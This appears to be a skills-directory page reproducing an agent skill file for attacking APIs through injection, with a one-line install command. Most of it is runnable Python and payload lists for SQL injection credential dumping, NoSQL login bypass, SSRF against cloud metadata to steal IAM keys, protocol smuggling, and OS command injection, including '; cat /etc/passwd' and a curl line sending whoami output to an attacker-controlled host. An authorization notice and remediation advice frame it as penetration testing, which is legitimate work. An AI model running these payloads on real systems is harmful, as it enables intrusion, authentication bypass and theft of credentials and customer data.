exploiting-api-injection-vulnerabilities

Tests APIs for injection vulnerabilities including SQL injection, NoSQL injection, OS command injection, LDAP injection, and Server-Side Request Forgery (SSRF) through API parameters, headers, and request bodies. The tester crafts malicious payloads targeting different backend technologies and injection contexts to extract data, execute commands, or access internal services. Maps to OWASP API8:2023 Security Misconfiguration and API7:2023 SSRF. Activates for requests involving API injection testing, SQLi in APIs, NoSQL injection, SSRF testing, or API input validation assessment.

Safety Notice

This listing is imported from skills.sh public index metadata. Review upstream SKILL.md and repository scripts before running.

Copy this and send it to your AI assistant to learn

Install skill "exploiting-api-injection-vulnerabilities" with this command: npx skills add mukul975/anthropic-cybersecurity-skills/mukul975-anthropic-cybersecurity-skills-exploiting-api-injection-vulnerabilities

Exploiting API Injection Vulnerabilities

When to Use

  • Testing API endpoints that accept user input for database queries, system commands, or external requests
  • Assessing APIs that interact with SQL databases, NoSQL stores (MongoDB, Redis), LDAP directories, or external URLs
  • Evaluating input validation and parameterized query usage across all API endpoints
  • Testing for SSRF where API parameters accept URLs or hostnames that trigger server-side requests
  • Identifying injection points in headers, path parameters, query strings, and JSON/XML request bodies

Do not use without written authorization. Injection testing can modify or destroy data and compromise backend systems.

Prerequisites

  • Written authorization specifying target API and backend systems in scope
  • Python 3.10+ with requests library
  • SQLMap for automated SQL injection detection and exploitation
  • Burp Suite Professional with Active Scan capabilities
  • Knowledge of the backend database technology (MySQL, PostgreSQL, MongoDB, Redis)
  • Isolated test environment to avoid production data corruption

Workflow

Step 1: Injection Point Identification

import requests
import json
import urllib.parse

BASE_URL = "https://target-api.example.com/api/v1"
headers = {"Authorization": "Bearer <token>", "Content-Type": "application/json"}

# Map all input points across the API
injection_points = [
    # Path parameters
    {"type": "path", "method": "GET", "url": "/users/{input}"},
    {"type": "path", "method": "GET", "url": "/products/{input}"},
    {"type": "path", "method": "GET", "url": "/orders/{input}"},
    # Query parameters
    {"type": "query", "method": "GET", "url": "/users?search={input}"},
    {"type": "query", "method": "GET", "url": "/products?sort={input}&order={input}"},
    {"type": "query", "method": "GET", "url": "/products?category={input}"},
    {"type": "query", "method": "GET", "url": "/search?q={input}"},
    # JSON body parameters
    {"type": "body", "method": "POST", "url": "/auth/login", "fields": ["username", "password"]},
    {"type": "body", "method": "POST", "url": "/users", "fields": ["name", "email"]},
    {"type": "body", "method": "POST", "url": "/search", "fields": ["query", "filters"]},
    {"type": "body", "method": "POST", "url": "/webhook", "fields": ["url", "callback_url"]},
    # Header parameters
    {"type": "header", "method": "GET", "url": "/users/me", "headers": ["X-Forwarded-For", "Referer", "User-Agent"]},
]

Step 2: SQL Injection Testing

# SQL injection payloads for different contexts
SQL_PAYLOADS = {
    "detection": [
        "'",
        "\"",
        "' OR '1'='1",
        "\" OR \"1\"=\"1",
        "1 OR 1=1",
        "' OR 1=1--",
        "' UNION SELECT NULL--",
        "1; WAITFOR DELAY '0:0:5'--",
        "1' AND SLEEP(5)--",
        "1)) OR 1=1--",
    ],
    "union_based": [
        "' UNION SELECT NULL,NULL,NULL--",
        "' UNION SELECT 1,2,3--",
        "' UNION SELECT username,password,NULL FROM users--",
        "-1 UNION SELECT table_name,NULL,NULL FROM information_schema.tables--",
    ],
    "error_based": [
        "' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))--",
        "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
    ],
    "time_based": [
        "' AND SLEEP(5)--",
        "'; WAITFOR DELAY '0:0:5'--",
        "' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
        "1; SELECT pg_sleep(5)--",
    ],
}

import time

def test_sql_injection(endpoint, param_name, param_type="query"):
    """Test a parameter for SQL injection."""
    results = []

    for category, payloads in SQL_PAYLOADS.items():
        for payload in payloads:
            start = time.time()

            if param_type == "query":
                url = f"{BASE_URL}{endpoint}"
                resp = requests.get(url, headers=headers,
                                  params={param_name: payload}, timeout=15)
            elif param_type == "body":
                resp = requests.post(f"{BASE_URL}{endpoint}",
                                   headers=headers,
                                   json={param_name: payload}, timeout=15)
            elif param_type == "path":
                url = f"{BASE_URL}{endpoint.replace('{input}', urllib.parse.quote(payload))}"
                resp = requests.get(url, headers=headers, timeout=15)

            elapsed = time.time() - start

            # Check for SQL injection indicators
            indicators = {
                "error": any(kw in resp.text.lower() for kw in [
                    "sql syntax", "mysql", "postgresql", "sqlite",
                    "oracle", "unterminated", "syntax error",
                    "unexpected end", "quoted string", "invalid input"
                ]),
                "time_based": elapsed > 4.5 and "SLEEP" in payload.upper(),
                "union_data": resp.status_code == 200 and len(resp.text) > 0
                              and "UNION" in payload.upper()
                              and resp.text != requests.get(f"{BASE_URL}{endpoint}",
                                  headers=headers, params={param_name: "test"}).text,
            }

            if any(indicators.values()):
                triggered = [k for k, v in indicators.items() if v]
                results.append({
                    "endpoint": endpoint,
                    "param": param_name,
                    "category": category,
                    "payload": payload,
                    "indicators": triggered,
                    "status": resp.status_code,
                    "time": f"{elapsed:.1f}s"
                })
                print(f"[SQLi] {endpoint} ({param_name}): {category} - {triggered}")

    return results

# Test search parameter
test_sql_injection("/search", "q", "query")
test_sql_injection("/products", "category", "query")
test_sql_injection("/auth/login", "username", "body")

Step 3: NoSQL Injection Testing

# NoSQL injection payloads (MongoDB-focused)
NOSQL_PAYLOADS = {
    "auth_bypass": [
        # MongoDB operator injection in JSON body
        {"username": {"$ne": ""}, "password": {"$ne": ""}},
        {"username": {"$gt": ""}, "password": {"$gt": ""}},
        {"username": {"$regex": ".*"}, "password": {"$regex": ".*"}},
        {"username": "admin", "password": {"$ne": "wrongpassword"}},
        {"username": {"$in": ["admin", "root", "administrator"]}, "password": {"$ne": ""}},
    ],
    "data_extraction": [
        {"username": {"$regex": "^a"}, "password": {"$ne": ""}},  # Enumerate first char
        {"username": {"$where": "this.username.length > 0"}, "password": {"$ne": ""}},
    ],
    "operator_injection_string": [
        # When input is a string field
        '{"$gt": ""}',
        '{"$ne": null}',
        '{"$regex": ".*"}',
        '{"$where": "1==1"}',
    ],
}

def test_nosql_injection(endpoint, method="POST"):
    """Test for MongoDB NoSQL injection."""
    results = []

    # Test JSON body operator injection
    for category, payloads in NOSQL_PAYLOADS.items():
        for payload in payloads:
            if isinstance(payload, dict):
                resp = requests.post(f"{BASE_URL}{endpoint}",
                                   headers=headers, json=payload, timeout=10)
            else:
                # Test as string parameter
                resp = requests.post(f"{BASE_URL}{endpoint}",
                                   headers=headers,
                                   json={"username": json.loads(payload), "password": "test"},
                                   timeout=10)

            if resp.status_code == 200:
                resp_data = resp.json() if resp.text else {}
                if "token" in str(resp_data) or "user" in str(resp_data):
                    results.append({
                        "endpoint": endpoint,
                        "category": category,
                        "payload": str(payload)[:100],
                        "authenticated": True,
                        "response": str(resp_data)[:200]
                    })
                    print(f"[NoSQLi] {endpoint}: {category} - Auth bypass successful")

    return results

nosql_results = test_nosql_injection("/auth/login")

Step 4: Server-Side Request Forgery (SSRF) Testing

# SSRF payloads targeting internal services
SSRF_PAYLOADS = {
    "cloud_metadata": [
        "http://169.254.169.254/latest/meta-data/",                           # AWS IMDS
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",  # AWS IAM creds
        "http://metadata.google.internal/computeMetadata/v1/",                # GCP
        "http://169.254.169.254/metadata/instance?api-version=2021-02-01",    # Azure
    ],
    "internal_services": [
        "http://localhost:8080/",
        "http://127.0.0.1:6379/",           # Redis
        "http://127.0.0.1:9200/",           # Elasticsearch
        "http://127.0.0.1:27017/",          # MongoDB
        "http://internal-api.local:8080/",
        "http://10.0.0.1/admin/",
    ],
    "protocol_smuggling": [
        "gopher://127.0.0.1:6379/_SET%20pwned%20true",
        "file:///etc/passwd",
        "dict://127.0.0.1:6379/INFO",
    ],
    "bypass_filters": [
        "http://0x7f000001/",                # Hex IP for 127.0.0.1
        "http://2130706433/",                # Decimal IP for 127.0.0.1
        "http://0177.0.0.1/",               # Octal
        "http://127.0.0.1.nip.io/",         # DNS rebinding
        "http://[::1]/",                     # IPv6 localhost
        "http://127.1/",                     # Shortened IP
        "http://0/",                         # Zero
    ],
}

def test_ssrf(endpoint, url_param, method="POST"):
    """Test for SSRF in URL-accepting parameters."""
    results = []

    for category, payloads in SSRF_PAYLOADS.items():
        for payload in payloads:
            try:
                if method == "POST":
                    resp = requests.post(f"{BASE_URL}{endpoint}",
                                       headers=headers,
                                       json={url_param: payload}, timeout=10)
                else:
                    resp = requests.get(f"{BASE_URL}{endpoint}",
                                      headers=headers,
                                      params={url_param: payload}, timeout=10)

                # Check for SSRF indicators
                if resp.status_code == 200 and len(resp.text) > 50:
                    # Check for cloud metadata
                    if any(kw in resp.text for kw in ["ami-id", "instance-id",
                                                       "iam", "AccessKeyId",
                                                       "root:x:", "computeMetadata"]):
                        results.append({
                            "endpoint": endpoint,
                            "category": category,
                            "payload": payload,
                            "severity": "critical",
                            "data": resp.text[:300]
                        })
                        print(f"[SSRF-CRITICAL] {endpoint}: {category} - {payload}")
                    else:
                        results.append({
                            "endpoint": endpoint,
                            "category": category,
                            "payload": payload,
                            "severity": "high",
                            "data": resp.text[:100]
                        })
                        print(f"[SSRF] {endpoint}: {category} - {payload} -> {resp.status_code}")
            except requests.exceptions.RequestException:
                pass

    return results

# Test endpoints that accept URLs
ssrf_results = test_ssrf("/webhook/test", "url")
ssrf_results.extend(test_ssrf("/import", "source_url"))
ssrf_results.extend(test_ssrf("/proxy", "target", "GET"))

Step 5: OS Command Injection Testing

# Command injection payloads
CMD_PAYLOADS = {
    "detection": [
        "; sleep 5",
        "| sleep 5",
        "` sleep 5 `",
        "$( sleep 5 )",
        "\n sleep 5",
        "& ping -c 5 127.0.0.1 &",
    ],
    "data_exfil": [
        "; cat /etc/passwd",
        "| id",
        "`whoami`",
        "$(uname -a)",
        "; curl http://attacker-controlled-server.com/$(whoami)",
    ],
    "windows": [
        "& ping -n 5 127.0.0.1 &",
        "| dir",
        "; type C:\\Windows\\System32\\drivers\\etc\\hosts",
        "& timeout /t 5 &",
    ],
}

def test_command_injection(endpoint, param_name, param_type="body"):
    """Test for OS command injection."""
    results = []

    for category, payloads in CMD_PAYLOADS.items():
        for payload in payloads:
            start = time.time()
            prefixed_payload = f"validvalue{payload}"

            if param_type == "body":
                resp = requests.post(f"{BASE_URL}{endpoint}",
                                   headers=headers,
                                   json={param_name: prefixed_payload}, timeout=15)
            else:
                resp = requests.get(f"{BASE_URL}{endpoint}",
                                  headers=headers,
                                  params={param_name: prefixed_payload}, timeout=15)

            elapsed = time.time() - start

            indicators = {
                "time_based": elapsed > 4.5 and "sleep" in payload.lower(),
                "output": any(kw in resp.text for kw in [
                    "root:", "uid=", "Linux", "Windows", "bin/bash",
                    "Directory of", "Volume Serial"
                ]),
            }

            if any(indicators.values()):
                results.append({
                    "endpoint": endpoint,
                    "param": param_name,
                    "category": category,
                    "payload": payload,
                    "indicators": [k for k, v in indicators.items() if v],
                })
                print(f"[CMDi] {endpoint} ({param_name}): {payload}")

    return results

# Test file processing and system interaction endpoints
test_command_injection("/export", "filename")
test_command_injection("/convert", "input_file")
test_command_injection("/ping", "host", "query")

Key Concepts

TermDefinition
SQL InjectionInserting SQL code into API parameters that are concatenated into database queries, enabling data extraction or modification
NoSQL InjectionInjecting NoSQL operators ($ne, $gt, $regex) into MongoDB queries or manipulating Redis/Elasticsearch queries through API parameters
SSRFServer-Side Request Forgery (OWASP API7:2023) - forcing the server to make HTTP requests to attacker-specified destinations including internal services
Command InjectionInjecting OS commands through API parameters that are passed to shell execution functions (exec, system, popen)
Parameterized QueriesUsing prepared statements with bound parameters to prevent SQL injection by separating code from data
Input ValidationServer-side verification that user input conforms to expected format, type, length, and character set before processing

Tools & Systems

  • SQLMap: Automated SQL injection detection and exploitation tool supporting all major database types
  • Burp Suite Professional: Active scanner with injection detection for SQL, NoSQL, SSRF, and command injection
  • NoSQLMap: Automated NoSQL injection detection and exploitation tool focused on MongoDB
  • SSRFmap: SSRF detection and exploitation framework with cloud metadata extraction modules
  • Commix: Automated OS command injection detection and exploitation tool

Common Scenarios

Scenario: E-Commerce API Injection Assessment

Context: An e-commerce API uses PostgreSQL for the product catalog, MongoDB for user sessions, and accepts webhook URLs for order notifications. The API is built with Node.js/Express.

Approach:

  1. Test product search endpoint GET /api/v1/products?search=test with SQL payloads - discover error-based SQLi revealing PostgreSQL 14 backend
  2. Exploit union-based SQLi to extract all table names, then dump user credentials from the users table
  3. Test login endpoint with NoSQL operators - {"username":{"$ne":""},"password":{"$ne":""}} bypasses authentication
  4. Test webhook URL endpoint for SSRF - POST /api/v1/webhooks {"url":"http://169.254.169.254/latest/meta-data/"} returns AWS instance metadata
  5. Extract AWS IAM role credentials via SSRF, gaining access to S3 buckets containing customer data
  6. Test file export endpoint for command injection - GET /api/v1/export?filename=report;cat /etc/passwd returns passwd file contents

Pitfalls:

  • Only testing SQL injection when the backend uses multiple data stores (SQL, NoSQL, Redis, Elasticsearch)
  • Missing injection points in HTTP headers (User-Agent, Referer, X-Forwarded-For) that may be logged to SQL databases
  • Not testing SSRF bypass techniques when the initial payload is blocked by URL validation
  • Assuming JSON API bodies are safe from SQL injection (JSON values are still concatenated into queries)
  • Not testing time-based injection when error messages are suppressed

Output Format

## Finding: SQL Injection in Product Search API Enables Full Database Access

**ID**: API-INJ-001
**Severity**: Critical (CVSS 9.8)
**OWASP API**: API8:2023 - Security Misconfiguration / Injection
**Affected Endpoints**:
  - GET /api/v1/products?search= (SQL injection)
  - POST /api/v1/auth/login (NoSQL injection)
  - POST /api/v1/webhooks (SSRF)

**Description**:
The product search API concatenates user input directly into a PostgreSQL
query without parameterization. An attacker can extract all database
contents including user credentials, payment information, and admin
secrets. Additionally, the login endpoint is vulnerable to MongoDB
NoSQL operator injection, and the webhook endpoint allows SSRF to
internal services and cloud metadata.

**Impact**:
- Full database read/write access via SQL injection
- Authentication bypass via NoSQL operator injection
- AWS IAM credential theft via SSRF to instance metadata
- Potential remote code execution via SQL injection stacked queries

**Remediation**:
1. Use parameterized queries for all database operations
2. Validate and sanitize NoSQL operator characters in JSON input
3. Implement URL allowlisting for webhook and callback URLs
4. Block access to cloud metadata endpoints (169.254.169.254) from application servers
5. Use an ORM with parameterized queries and disable raw query methods
6. Implement WAF rules for common injection patterns as defense in depth

Source Transparency

This detail page is rendered from real SKILL.md content. Trust labels are metadata-based hints, not a safety guarantee.

Related Skills

Related by shared tags or category signals.

Security

analyzing-certificate-transparency-for-phishing

No summary provided by upstream source.

Repository SourceNeeds Review
Security

analyzing-android-malware-with-apktool

No summary provided by upstream source.

Repository SourceNeeds Review
Security

analyzing-network-traffic-with-wireshark

No summary provided by upstream source.

Repository SourceNeeds Review
Security

analyzing-api-gateway-access-logs

No summary provided by upstream source.

Repository SourceNeeds Review